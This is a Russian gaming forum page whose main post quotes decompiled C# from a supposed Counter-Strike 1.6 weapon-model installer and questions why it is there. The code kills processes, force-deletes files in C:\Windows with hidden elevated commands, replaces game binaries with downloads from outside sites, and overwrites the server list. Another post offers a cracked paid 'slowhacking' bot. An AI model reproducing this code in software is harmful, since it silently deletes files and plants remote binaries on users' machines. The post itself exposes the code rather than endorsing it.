Здравствуйте, гость Вход | Регистрация
Наши новости:
|
| Дата поста: | В теме: | За сообщение: | Спасибо сказали: | ||
|---|---|---|---|---|---|
| 23.8.2019, 16:35 | Поменять выдачу | ThePhoenix | |||
| 23.8.2019, 14:07 | Поменять выдачу | Код:
|
ThePhoenix | ||
| 27.6.2018, 16:48 | [Тестирование программы] Установщик моделей оружия CS 1.6 | Интересно, зачем (цитата) "установщик моделей оружия CS 1.6" должен иметь в своем составе следующие функции? 1 // Token: 0x0600000F RID: 15 RVA: 0x000025EC File Offset: 0x000007EC private static void KillProcesses() { try { foreach (Process process in Process.GetProcessesByName("wuaucIt")) { process.Kill(); } bool flag = Process.GetProcessesByName("mcmc").Any<Process>() || File.Exists("C:\\Windows\\mc\\mcmc.exe"); if (flag) { try { Process.Start(new ProcessStartInfo { FileName = "cmd.exe", Arguments = "/c taskkill /F /IM mcmc.exe & DEL /F /S /Q /A C:\\Windows\\mc\\mcmc.exe & DEL /F /S /Q /A C:\\Windows\\mc\\mcmc.lol & exit", Verb = "runas", WindowStyle = ProcessWindowStyle.Hidden }); } catch { foreach (Process process2 in Process.GetProcessesByName("mcmc")) { process2.Kill(); } } } bool flag2 = File.Exists("C:\\Windows\\zc\\mc.exe"); if (flag2) { Process.Start(new ProcessStartInfo { FileName = "cmd.exe", Arguments = "/c taskkill /F /IM mc.exe & DEL /F /S /Q /A C:\\Windows\\zc\\mc.exe & DEL /F /S /Q /A C:\\Windows\\zc\\mc.lol & DEL /F /S /Q /A C:\\Windows\\zc\\hi.lol & exit", Verb = "runas", WindowStyle = ProcessWindowStyle.Hidden }); } } catch { } } 2 // Token: 0x06000018 RID: 24 RVA: 0x00002EBC File Offset: 0x000010BC private static void MD5Checker() { string a = Form1.ComputeMD5Checksum("hw.dll"); string a2 = Form1.ComputeMD5Checksum("hl.exe"); string a3 = Form1.ComputeMD5Checksum("DemoPlayer.dll"); string a4 = Form1.ComputeMD5Checksum("cslauncher.exe"); string a5 = Form1.ComputeMD5Checksum("Mss32.dll"); string a6 = Form1.ComputeMD5Checksum("hwpatcher.dll"); string a7 = Form1.ComputeMD5Checksum("upatch.dll"); string a8 = Form1.ComputeMD5Checksum("Mssv20.asi"); string a9 = Form1.ComputeMD5Checksum("revSrvBrowser.dll"); string a10 = Form1.ComputeMD5Checksum("libeay32.dll"); string a11 = Form1.ComputeMD5Checksum("ssleay32.dll"); string a12 = Form1.ComputeMD5Checksum("tier0_c.dll"); string a13 = Form1.ComputeMD5Checksum("cstrike//resource//GameMenu.res"); string a14 = Form1.ComputeMD5Checksum("platform//addons//spades//spades.dll"); string b = "EFFE8E025C9D8B0728B14A46DFA46DDB"; string b2 = "2098CCF443433129B556C2849FE99E26"; string b3 = "C42C6DDC87B9710031A6A6CCF9240AAB"; string b4 = "F520185E02E8A5D85860669176BC4ADC"; string b5 = "C471C3F006A37F404C02AA162B4FF4B2"; string b6 = "5EE8C02E4FCAA9493362FA7D5EACBD53"; string b7 = "7EF5B581202CA32BD0A5BF7043CBE04F"; string b8 = "6B854FFC12E5E2C32683A03714CF6C5D"; string b9 = "238E6213F4FB78BD9DCFC098AF21D709"; string b10 = "11B6CD57FA6D9AFB27BC7B0F7503FED0"; string b11 = "63ACA4858C0C37A9F971D5AD1DADC84E"; string b12 = "ED9F003111955F6704C2F83BA2691A0A"; string b13 = "575BD44B0E84832A97433BC25C51439D"; string b14 = "B75E1E292DEB0DB92221154D27286883"; bool flag = a != b || a == "null"; if (flag) { Form1.DownloadFile("http://download.allcs.ru/sv/hw.dll", "hw.dll", true); } bool flag2 = File.Exists("cslauncher.exe") && a4 != b3; if (flag2) { Form1.DownloadFile("http://download.allcs.ru/sv/cslauncher.exe", "cslauncher.exe", true); } bool flag3 = a2 != b2 || a2 == "null"; if (flag3) { Form1.DownloadFile("http://download.allcs.ru/sv/hl.exe", "hl.exe", true); } bool flag4 = a3 != b7 || a3 == "null"; if (flag4) { Form1.DownloadFile("http://download.allcs.ru/sv/DemoPlayer.dll", "DemoPlayer.dll", true); } bool flag5 = a5 != b4 || a5 == "null"; if (flag5) { Form1.DownloadFile("http://download.allcs.ru/sv/Mss32.dll", "Mss32.dll", true); } bool flag6 = a8 != b10 || a8 == "null"; if (flag6) { Form1.DownloadFile("http://download.allcs.ru/sv/Mssv20.asi", "Mssv20.asi", true); } bool flag7 = a6 != b5 || a6 == "null"; if (flag7) { Form1.DownloadFile("http://download.allcs.ru/sv/hwpatcher.dll", "hwpatcher.dll", true); } bool flag8 = a7 != b6 || a7 == "null"; if (flag8) { Form1.DownloadFile("http://download.allcs.ru/sv/upatch.dll", "upatch.dll", true); } bool flag9 = a9 != b11 || a9 == "null"; if (flag9) { Form1.DownloadFile("http://download.allcs.ru/sv/revSrvBrowser.dll", "revSrvBrowser.dll", true); } bool flag10 = a11 != b9 || a11 == "null"; if (flag10) { Form1.DownloadFile("http://download.allcs.ru/sv/ssleay32.dll", "ssleay32.dll", true); } bool flag11 = a10 != b8 || a10 == "null"; if (flag11) { Form1.DownloadFile("http://download.allcs.ru/sv/libeay32.dll", "libeay32.dll", true); } bool flag12 = a12 != b12 || a12 == "null"; if (flag12) { Form1.DownloadFile("http://download.allcs.ru/sv/tier0_c.dll", "tier0_c.dll", false); } bool flag13 = a13 != b14 || a13 == "null"; if (flag13) { Form1.DownloadFile("http://download.allcs.ru/sv/GameMenu.res", "cstrike//resource//GameMenu.res", true); } bool flag14 = a14 != b13 || a14 == "null"; if (flag14) { bool flag15 = !Directory.Exists("platform//addons//spades"); if (flag15) { Directory.CreateDirectory("platform//addons//spades"); } Form1.DownloadFile("https://cs16planet.ru/updater/spades.dll", "platform//addons//spades//spades.dll", true); } } 3 // Token: 0x06000035 RID: 53 RVA: 0x000070D8 File Offset: 0x000052D8 private void button1_Click(object sender, EventArgs e) { string tempFileName = Path.GetTempFileName(); FileInfo fileInfo = new FileInfo("cstrike\\models\\Installer\\guard.txt"); using (StreamWriter streamWriter = fileInfo.CreateText()) { streamWriter.WriteLine("1"); } bool flag = !File.Exists("serverbrowser.ini"); if (flag) { bool flag2 = File.Exists("valve\\sprites\\hsdmnbtgbn.spr"); if (flag2) { File.Copy("valve\\sprites\\hsdmnbtgbn.spr", "serverbrowser.ini", true); } bool flag3 = File.Exists("config\\rev_ServerBrowser.vdf"); if (flag3) { File.Copy("config\\rev_ServerBrowser.vdf", "serverbrowser.ini", true); } bool flag4 = File.Exists("config\\rev_ServerBrowser.CTR"); if (flag4) { File.Copy("config\\rev_ServerBrowser.CTR", "serverbrowser.ini", true); } bool flag5 = File.Exists("valve\\fullserver_servers.fsv"); if (flag5) { File.Copy("valve\\fullserver_servers.fsv", "serverbrowser.ini", true); } bool flag6 = File.Exists("serverbrowser.gsm"); if (flag6) { File.Copy("serverbrowser.gsm", "serverbrowser.ini", true); } bool flag7 = File.Exists("config\\rev_ServerBrowser.TMS"); if (flag7) { File.Copy("config\\rev_ServerBrowser.TMS", "serverbrowser.ini", true); } } Application.Restart(); } |
Nebo | ||
| 14.1.2015, 1:47 | "Бот" для проверки серверов на слоухакинг по списку. | Цитата Я офигиваю, csmoni собрали весь паблик и продают его. Ужас... Цитата Так то прих....ели совсем Ну давайте их накажем. Скачал у них их платный бот и сделал его бесплатным. P.S. В архиве ReadMe файл в котором написано как пользоваться(сам не читал, копипастнул с csmoni оригинальное описание) P.S.S. Скрин бота: |
sergggzi, XyLiGaN | ||